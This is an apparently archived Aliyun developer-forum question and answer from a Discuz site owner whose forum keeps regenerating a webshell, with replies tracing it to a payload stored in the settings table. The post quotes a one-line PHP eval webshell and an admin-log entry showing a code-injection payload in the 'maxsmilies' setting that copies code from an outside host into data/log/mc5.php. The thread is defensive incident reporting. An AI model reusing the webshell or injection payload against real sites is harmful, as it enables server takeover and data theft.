我的discuz论坛被植入后门删掉又出现，用安骑士可以彻底修复吗？-阿里云开发者社区

{"moduleinfo":{"rightTitle":"个人中心","menu_count":[{"count_phone":6,"count":6}],"rightMenu_count":[{"count_phone":3,"count":3}]},"menu":[{"ismoreList":"false","menuTitle":"首页","menuLink":"//developer.aliyun.com"},{"ismoreList":"true","submenu":[{"submenuLink":"//developer.aliyun.com/group","morsubemenu":[{"morsubemenuTitle":"云计算","morsubemenuLink":"//developer.aliyun.com/group/cloud","tce_rule_count":"1"},{"morsubemenuTitle":"大数据","morsubemenuLink":"//developer.aliyun.com/group/bigdata","tce_rule_count":"1"},{"morsubemenuTitle":"人工智能","morsubemenuLink":"//developer.aliyun.com/group/ai","tce_rule_count":"1"},{"morsubemenuTitle":"IoT","morsubemenuLink":"//developer.aliyun.com/group/iot","tce_rule_count":"1"},{"morsubemenuTitle":"云原生","morsubemenuLink":"//developer.aliyun.com/group/cloudnative","tce_rule_count":"1"},{"morsubemenuTitle":"数据库","morsubemenuLink":"//developer.aliyun.com/group/database","tce_rule_count":"1"},{"morsubemenuTitle":"开发与运维","morsubemenuLink":"//developer.aliyun.com/group/othertech","tce_rule_count":"1"},{"morsubemenuTitle":"微服务","morsubemenuLink":"//developer.aliyun.com/group/microservice","tce_rule_count":"1"},{"morsubemenuTitle":"安全","morsubemenuLink":"//developer.aliyun.com/group/security","tce_rule_count":"1"}],"moresubmenuTitle":"技术领域"},{"submenuLink":"//developer.aliyun.com/group?groupType=other","morsubemenu":[{"morsubemenuTitle":"阿里巴巴大数据计算","morsubemenuLink":"//developer.aliyun.com/group/maxcompute"},{"morsubemenuTitle":"阿里云物联网","morsubemenuLink":"//developer.aliyun.com/group/aliiot"},{"morsubemenuTitle":"阿里云数据库","morsubemenuLink":"//developer.aliyun.com/group/aliyundb"},{"morsubemenuTitle":"阿里云存储服务","morsubemenuLink":"//developer.aliyun.com/group/storage"},{"morsubemenuTitle":"阿里中间件","morsubemenuLink":"//developer.aliyun.com/group/aliware"},{"morsubemenuTitle":"阿里云容器服务","morsubemenuLink":"//developer.aliyun.com/group/kubernetes"},{"morsubemenuTitle":"阿里云实时计算","morsubemenuLink":"//developer.aliyun.com/group/sc"},{"morsubemenuTitle":"支付宝开发者社区","morsubemenuLink":"//developer.aliyun.com/group/alipay"},{"morsubemenuTitle":"蚂蚁金服科技","morsubemenuLink":"//developer.aliyun.com/group/ant"},{"morsubemenuTitle":"阿里巴巴研发效能","morsubemenuLink":"//developer.aliyun.com/group/yunxiao"},{"morsubemenuTitle":"更多圈子","morsubemenuLink":"//developer.aliyun.com/group?groupType=other"}],"moresubmenuTitle":"产品与生态"},{"submenuLink":"//developer.aliyun.com/group?groupType=open_source","morsubemenu":[{"morsubemenuTitle":"阿里开源","morsubemenuLink":"//developer.aliyun.com/group/opensource","tce_rule_count":"1"}],"moresubmenuTitle":"开源"}],"menuTitle":"技术与产品","menuLink":"//developer.aliyun.com/group"},{"ismoreList":"false","submenu":[{"submenuTitle":"API","submenuLink":"//developer.aliyun.com/tool#tab=api","tce_rule_count":"1"},{"submenuTitle":"SDK","submenuLink":"https://developer.aliyun.com/sdk/java.html","tce_rule_count":"1"},{"submenuTitle":"云产品工具","submenuLink":"//developer.aliyun.com/tool#tab=yuntool","tce_rule_count":"1"},{"submenuTitle":"开源工具","submenuLink":"//developer.aliyun.com/tool#tab=opensource","tce_rule_count":"1"},{"submenuTitle":"镜像站","submenuLink":"//developer.aliyun.com/tool#tab=mirror","tce_rule_count":"1"}],"menuTitle":"工具","menuLink":"//developer.aliyun.com/tool"},{"ismoreList":"false","menuTitle":"问答","menuLink":"//developer.aliyun.com/ask"},{"ismoreList":"false","submenu":[{"submenuTitle":"学习中心","submenuLink":"//developer.aliyun.com/learning","tce_rule_count":"1"},{"submenuTitle":"技能测试中心","submenuLink":"//developer.aliyun.com/exam","tce_rule_count":"1"},{"submenuTitle":"公开课","submenuLink":"//developer.aliyun.com/live","tce_rule_count":"1"},{"submenuTitle":"考试认证","submenuLink":"//edu.aliyun.com/certification","tce_rule_count":"1"}],"menuTitle":"学习与认证"},{"ismoreList":"true","submenu":[{"tce_rule_count":"1","morsubemenu":[{"morsubemenuTitle":"阿里云MVP","morsubemenuLink":"//mvp.aliyun.com","tce_rule_count":"1"},{"morsubemenuTitle":"ACE同城会","morsubemenuLink":"//mvp.aliyun.com/ace","tce_rule_count":"1"},{"morsubemenuTitle":"共创空间","morsubemenuLink":"//mvp.aliyun.com/crowdsource","tce_rule_count":"1"}],"moresubmenuTitle":"社群"},{"tce_rule_count":"1","morsubemenu":[{"morsubemenuTitle":"大赛","morsubemenuLink":"//tianchi.aliyun.com/competition/gameList/activeList","tce_rule_count":"1"},{"morsubemenuTitle":"实验室","morsubemenuLink":"//tianchi.aliyun.com/notebook-ai","tce_rule_count":"1"},{"morsubemenuTitle":"数据集","morsubemenuLink":"//tianchi.aliyun.com/dataset","tce_rule_count":"1"}],"moresubmenuTitle":"天池"},{"tce_rule_count":"1","morsubemenu":[{"morsubemenuTitle":"创新资讯","morsubemenuLink":"//chuangke.aliyun.com/info/list","tce_rule_count":"1"},{"morsubemenuTitle":"风池计划","morsubemenuLink":"//chuangke.aliyun.com/markets/aliyun/surpportive","tce_rule_count":"1"},{"morsubemenuTitle":"园区入驻","morsubemenuLink":"//chuangke.aliyun.com/incubator","tce_rule_count":"1"},{"morsubemenuTitle":"AI赛道明星","morsubemenuLink":"//chuangke.aliyun.com/star","tce_rule_count":"1"},{"morsubemenuTitle":"加速器","morsubemenuLink":"//chuangke.aliyun.com/markets/aliyun/taofuchengzhen","tce_rule_count":"1"}],"moresubmenuTitle":"创新创业"}],"menuTitle":"社群与活动"}],"rightMenu":[{"menuTitle":"个人设置","menuLink":"//developer.aliyun.com/my#/settings"},{"menuTitle":"我的问答","menuLink":"//developer.aliyun.com/my#/ask"},{"menuTitle":"我的文章","menuLink":"//developer.aliyun.com/my#/article"}],"countinfo":{"menu":{"length_pc":0,"length":0},"rightMenu":{"length_pc":0,"length":0}},"$tmsId":"tce/2206927"}

{"moduleinfo":{"searchLink":"//m.aliyun.com/product/search","channels_count":[{"count_phone":11,"count":11}],"searchText":"ecs","noAppDownload":false,"logo":"//gw.alicdn.com/tps/TB11eICOFXXXXaLapXXXXXXXXXX-130-39.png"},"channels":[{"spmId":"0","maxShowNum":"6","isOpenSubChannel":"false","link":"//developer.aliyun.com/","title":"首页"},{"spmId":"0","maxShowNum":"9","isOpenSubChannel":"false","title":"技术领域","subChannels":[{"tce_rule_count":"1","link":"//developer.aliyun.com/group/cloud","title":"云计算"},{"spmId":"0","tce_rule_count":"1","link":"//developer.aliyun.com/group/bigdata","title":"大数据"},{"spmId":"0","tce_rule_count":"1","link":"//developer.aliyun.com/group/ai","title":"人工智能"},{"spmId":"0","tce_rule_count":"1","link":"//developer.aliyun.com/group/iot","title":"IoT"},{"spmId":"0","tce_rule_count":"1","link":"//developer.aliyun.com/group/cloudnative","title":"云原生"},{"spmId":"0","tce_rule_count":"1","link":"//developer.aliyun.com/group/database","title":"数据库"},{"spmId":"0","tce_rule_count":"1","link":"//developer.aliyun.com/group/othertech","title":"开发与运维"},{"spmId":"0","tce_rule_count":"1","link":"//developer.aliyun.com/group/microservice","title":"微服务"},{"spmId":"0","tce_rule_count":"1","link":"//developer.aliyun.com/group/security","title":"安全"}]},{"spmId":"0","maxShowNum":"6","isOpenSubChannel":"false","link":"//developer.aliyun.com/group?groupType=other","title":"产品与生态","subChannels":[{"spmId":"0","link":"//developer.aliyun.com/group/maxcompute","title":"阿里巴巴大数据计算"},{"spmId":"0","link":"//developer.aliyun.com/group/aliiot","title":"阿里云物联网"},{"spmId":"0","link":"//developer.aliyun.com/group/aliyundb","title":"阿里云数据库"},{"spmId":"0","link":"//developer.aliyun.com/group/storage","title":"阿里云存储服务"},{"spmId":"0","link":"//developer.aliyun.com/group/aliware","title":"阿里巴巴中间件"},{"spmId":"0","link":"//developer.aliyun.com/group/kubernetes","title":"阿里云容器服务"},{"spmId":"0","link":"//developer.aliyun.com/group/sc","title":"阿里云实时计算"},{"spmId":"0","link":"//developer.aliyun.com/group/alipay","title":"支付宝开发者社区"},{"spmId":"0","link":"//developer.aliyun.com/group/ant","title":"蚂蚁金服科技"},{"spmId":"0","link":"//developer.aliyun.com/group/yunxiao","title":"阿里巴巴研发效能"},{"spmId":"0","link":"//developer.aliyun.com/group?groupType=other","smallText":"二级频道","title":"更多圈子"}]},{"spmId":"0","maxShowNum":"6","isOpenSubChannel":"false","link":"//developer.aliyun.com/group/opensource","title":"阿里开源"},{"spmId":"0","maxShowNum":"6","isOpenSubChannel":"false","link":"//developer.aliyun.com/tool","title":"工具","subChannels":[{"spmId":"0","tce_rule_count":"1","link":"//developer.aliyun.com/api","title":"API"},{"spmId":"0","tce_rule_count":"1","link":"//developer.aliyun.com/sdk","title":"SDK"},{"spmId":"0","tce_rule_count":"1","link":"//developer.aliyun.com/tool#tab=yuntool","title":"云产品工具"},{"spmId":"0","tce_rule_count":"1","link":"//developer.aliyun.com/tool#tab=opensource","title":"开源工具"},{"spmId":"0","tce_rule_count":"1","link":"//developer.aliyun.com/openplatform/scenes","title":"最佳实践"}]},{"spmId":"0","isOpenSubChannel":"false","link":"//developer.aliyun.com/ask","title":"问答"},{"spmId":"0","channelStr":"频道描述","maxShowNum":"6","isOpenSubChannel":"false","link":"//developer.aliyun.com/learning","title":"学习与认证","subChannels":[{"spmId":"0","tce_rule_count":"1","link":"//developer.aliyun.com/learning","title":"学习中心"},{"spmId":"0","tce_rule_count":"1","link":"//developer.aliyun.com/exam","title":"技能测试中心"},{"spmId":"0","tce_rule_count":"1","link":"//developer.aliyun.com/live","title":"公开课"},{"spmId":"0","tce_rule_count":"1","link":"//edu.aliyun.com/certification","title":"考试认证"}]},{"spmId":"0","channelStr":"频道描述","maxShowNum":"6","isOpenSubChannel":"false","link":"https://developer.aliyun.com/","title":"社群","subChannels":[{"tce_rule_count":"1","link":"//mvp.aliyun.com","title":"阿里云MVP"},{"spmId":"0","tce_rule_count":"1","link":"//mvp.aliyun.com/ace","title":"ACE同城会"},{"spmId":"0","tce_rule_count":"1","link":"//mvp.aliyun.com/crowdsource","title":"共创空间"}]},{"spmId":"0","channelStr":"频道描述","maxShowNum":"6","isOpenSubChannel":"false","link":"//tianchi.aliyun.com/","title":"天池","subChannels":[{"spmId":"0","tce_rule_count":"1","link":"//tianchi.aliyun.com/competition/","title":"大赛"},{"spmId":"0","tce_rule_count":"1","link":"//tianchi.aliyun.com/notebook-ai/","title":"实验室"},{"spmId":"0","tce_rule_count":"1","link":"//tianchi.aliyun.com/dataset/","title":"数据集"}]},{"spmId":"0","maxShowNum":"6","isOpenSubChannel":"false","link":"//chuangke.aliyun.com","title":"创新创业","subChannels":[{"spmId":"0","tce_rule_count":"1","link":"//chuangke.aliyun.com/info/list","title":"创新资讯"},{"spmId":"0","tce_rule_count":"1","link":"//chuangke.aliyun.com/markets/aliyun/surpportive","title":"风池计划"},{"spmId":"0","tce_rule_count":"1","link":"//chuangke.aliyun.com/incubator/","title":"园区入驻"},{"spmId":"0","tce_rule_count":"1","link":"//chuangke.aliyun.com/star","title":"AI赛道明星"},{"spmId":"0","tce_rule_count":"1","link":"//chuangke.aliyun.com/markets/aliyun/taofuchengzhen","title":"加速器"}]},{"spmId":"0","maxShowNum":"6","isOpenSubChannel":"false","title":"个人中心","subChannels":[{"spmId":"0","tce_rule_count":"1","link":"//developer.aliyun.com/my#/settings","title":"个人设置"},{"spmId":"0","tce_rule_count":"1","link":"//developer.aliyun.com/my#/ask","title":"我的问答"},{"spmId":"0","tce_rule_count":"1","link":"//developer.aliyun.com/my#/article","title":"我的文章"}]}],"countinfo":{"channels":{"length_pc":0,"length":0}},"$tmsId":"tce/2207791"}

开发者社区> 问答> 正文

我的discuz论坛被植入后门删掉又出现，用安骑士可以彻底修复吗？

厂长

2016-07-16 16:16:13

6376

月初的时候收到阿里云的短信通知说论坛的目录中发现有两个webshell的的木马，在discuz论坛的 data/log 目录中，其中一个叫mc5.php文件内的代码为
\"%><?php eval($_POST[ob]);?><%' 我上百度查了下是可以执行任何php程式的木马，另一个php文件代码很多，好像是用来脱库的，于是我立刻删掉了这两个文件。

然后我在discuz后台发现有人盗用了管理员的密码！并在后台执行了以下两行代码(在后台的管理记录中查看到的)，两行代码执行的位置都在后台的域名设置中，视乎是利用后台的域名设置选项中的漏洞上传的这个后门！我当时立刻修改了管理员密码，想说是不是堵住了漏洞！

GET={settingnew={siteuniqueid=9999; my_sitekey=123456; my_siteid=999; }; domainsubmit=提交; }; POST={settingnew={siteuniqueid=9999; my_sitekey=123456; my_siteid=999; }; domainsubmit=提交; };

GET={settingnew={maxsmilies=1{${copy('http://t.34597.vip/tm.txt','./data/log/mc5.php')}}; }; domainsubmit=提交; }; POST={settingnew={maxsmilies=1{${copy('http://t.34597.vip/tm.txt','./data/log/mc5.php')}}; }; domainsubmit=提交; };

但是今天我又收到阿里云的检查到同样的webshell木马，就是那个mc5.php，我上服务器删掉文件，但是立即又生成一个，我去查看discuz的后台管理记录，发现并没有其他人登陆过后台，现在不知道黑客是利用的什么来上传的文件？是不是因为之前管理员密码被盗执行的那两行代码没有得到修复？我想知道如果购买了安骑士专业版，是可以找出并堵住漏洞还是只能够查出木马然后屏蔽？如果只是屏蔽不能堵住漏洞的话，跟我现在手动删掉就没啥区别！

安全 PHP 数据安全/隐私保护

取消提交回答

全部回答(2)

dageda
2016-07-25 10:01:07

Re我的discuz论坛被植入后门删掉又出现，用安骑士可以彻底修复吗？
这种情况你可以先把discuz后台密码修改为强密码，防止再被黑客进入后台
这种漏洞安骑士现在暂时没法修复的，关键在这行代码

你可以在本地写一个测试脚本

这行代码相当于web的后门，PHP在解析到这段payload的时候，会立刻自动执行并不返回结果，所以你一开始即使修改了密码，黑客只要访问到和maxsmilies有关的页面时，webshell又会自动生成

0 0
厂长
2016-07-16 21:21:20

Re我的discuz论坛被植入后门删掉又出现，用安骑士可以彻底修复吗？
自己摸索着解决了，原来是被写入了数据库自动下载那个后门文件！在pre_common_setting这个表里找到相关字段删除即可！希望可以帮到遇到此问题并像我一样的菜鸟！

0 0

添加回答

安全

+ 订阅

云安全开发者的大本营

推荐文章

展开

相似问题

展开

推荐课程

Web站点安全监控
学习人数：19
远程运维安全
学习人数：108
云上视频内容的安全保护
学习人数：32